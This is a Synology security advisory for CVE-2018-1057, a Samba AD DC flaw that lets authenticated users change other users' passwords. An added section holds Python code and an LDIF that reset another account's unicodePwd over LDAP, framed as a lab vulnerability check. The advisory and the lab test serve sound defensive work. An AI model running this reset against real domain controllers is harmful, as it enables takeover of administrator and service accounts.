Synology-SA-18:08 Samba

Publish Time: 2018-03-14 16:54:07 UTC+8

Last Updated: 2018-03-27 16:03:27 UTC+8

Severity
Important
Status
Resolved

Abstract

CVE-2018-1057 allows remote authenticated users to change other users' passwords via a susceptible version of Synology DiskStation Manager (DSM) with Active Directory Server installed.

Synology rates the overall severity as Important according to CVSS v3.0 metrics. However, the vulnerable functionality is disabled by default, and there is no user interface to enable it. Synology has therefore decided to defer the fix to an upcoming update within the next 90 days.

Affected Products

Product                   Severity    Fixed Release Availability
Active Directory Server   Important   Upgrade DSM 6.1 to 6.1.6-15266.

Mitigation

If you need immediate assistance, please contact security@synology.com.

Detail

  • CVE-2018-1057
    • Severity: Important
    • CVSS3 Base Score: 7.5
    • CVSS3 Vector: CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H/RL:T
    • On a Samba 4 AD DC, the LDAP server in all versions of Samba from 4.0.0 onwards incorrectly validates permissions to modify passwords over LDAP, allowing authenticated users to change any other user's password, including those of administrative users and privileged service accounts (e.g., Domain Controllers).
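
The following is an added lab check for the condition described above; it is not code from Synology or the Samba project. On a Samba AD DC a password reset over LDAP is a single replace of the unicodePwd attribute, whose value is the new password wrapped in double quotes and encoded as UTF-16LE. A low-privileged test account that can perform that replace against an account it does not own exhibits the vulnerability; a fixed DC answers insufficientAccessRights (result code 50). The DNs, the LDAP URL and the optional use of python-ldap for the live request are assumptions, not part of the advisory; the encoding, LDIF and result-code classification run offline.

```python
"""Added example (not Synology's or Samba's own code): lab check for CVE-2018-1057.

Assumed: the DNs below are constructed for illustration, and python-ldap is
installed only if you call live_check(). Everything else runs offline.
"""
import base64

LDAP_SUCCESS = 0
LDAP_INSUFFICIENT_ACCESS = 50
LDAP_UNWILLING_TO_PERFORM = 53


def encode_unicode_pwd(password: str) -> bytes:
    """AD and Samba require the new unicodePwd value quoted and UTF-16LE encoded."""
    return ('"' + password + '"').encode("utf-16-le")


def build_reset_ldif(target_dn: str, new_password: str) -> str:
    """LDIF that resets (not changes) the target's password with one replace.

    Feed it to `ldapmodify -H ldaps://<dc> -D <low-priv DN> -W` to test by hand.
    """
    b64 = base64.b64encode(encode_unicode_pwd(new_password)).decode("ascii")
    return "\n".join([
        f"dn: {target_dn}",
        "changetype: modify",
        "replace: unicodePwd",
        f"unicodePwd:: {b64}",   # '::' marks a base64-encoded value in LDIF
        "",
    ])


def classify(result_code) -> str:
    """Turn the DC's result code for the replace into a verdict."""
    if result_code == LDAP_SUCCESS:
        return "VULNERABLE"       # a low-privileged bind reset someone else's password
    if result_code == LDAP_INSUFFICIENT_ACCESS:
        return "NOT VULNERABLE"   # the ACL check rejected the reset, as it should
    return "INCONCLUSIVE"         # e.g. 53: unencrypted connection or policy refusal


def live_check(url, bind_dn, bind_pw, target_dn, new_password) -> str:
    """Send the replace with python-ldap (assumed installed) and return the verdict.

    Use ldaps:// (the DC typically refuses password sets over plaintext) and run
    this only against a lab DC with a throwaway target account.
    """
    import ldap  # python-ldap; imported here so the offline helpers need no dependency
    conn = ldap.initialize(url)
    conn.simple_bind_s(bind_dn, bind_pw)
    try:
        conn.modify_s(target_dn, [(ldap.MOD_REPLACE, "unicodePwd",
                                   [encode_unicode_pwd(new_password)])])
        code = LDAP_SUCCESS
    except ldap.INSUFFICIENT_ACCESS:
        code = LDAP_INSUFFICIENT_ACCESS
    except ldap.UNWILLING_TO_PERFORM:
        code = LDAP_UNWILLING_TO_PERFORM
    finally:
        conn.unbind_s()
    return classify(code)


if __name__ == "__main__":
    # Constructed DN for illustration: print the LDIF a tester would pipe to ldapmodify.
    print(build_reset_ldif("CN=svc-backup,CN=Users,DC=lab,DC=example", "Temp-Passw0rd!"))
```

Bind as an ordinary domain user, not an administrator, and target an account that user does not own; a success from an unpatched DC means the reset went through, and the target's old password no longer works. The result code 53 path is worth recognising: it usually means the connection was not encrypted or a password policy rejected the value, not that the ACL check worked, so it proves nothing either way.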

Reference

Revision

Revision   Date         Description
1          2018-03-14   Initial public release.
2          2018-03-27   Update for Active Directory Server is now available in Affected Products.